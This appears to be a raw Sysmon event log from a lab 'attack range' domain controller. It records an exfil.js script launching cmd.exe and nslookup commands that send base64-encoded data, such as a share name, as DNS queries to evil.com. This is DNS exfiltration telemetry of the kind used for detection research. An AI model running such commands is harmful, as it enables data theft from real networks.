14:16:04.760{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-9A3D-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{2E1864BB-17A1-629A-783D-000000005F02}55525744C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-9A3D-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.763{2E1864BB-17A4-629A-9A3D-000000005F02}4908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljny.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.744{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluohd.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.713{2E1864BB-17A4-629A-983D-000000005F02}54008000C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-993D-000000005F02}3308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.697{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-993D-000000005F02}3308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.697{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.697{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.697{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.697{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.697{2E1864BB-17A4-629A-973D-000000005F02}81246520C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-993D-000000005F02}3308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.708{2E1864BB-17A4-629A-993D-000000005F02}3308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-973D-000000005F02}8124C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluohd.tmp 2>&1 10341000x8000000000000000194004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.675{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-983D-000000005F02}5400C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.659{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-983D-000000005F02}5400C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.659{2E1864BB-17A4-629A-983D-000000005F02}54008000C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-973D-000000005F02}8124C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.645{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-983D-000000005F02}5400C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-973D-000000005F02}8124C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-17A1-629A-783D-000000005F02}55522692C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-973D-000000005F02}8124C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.641{2E1864BB-17A4-629A-973D-000000005F02}8124C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluohd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.628{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqin.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-17A4-629A-953D-000000005F02}20767648C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-963D-000000005F02}708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll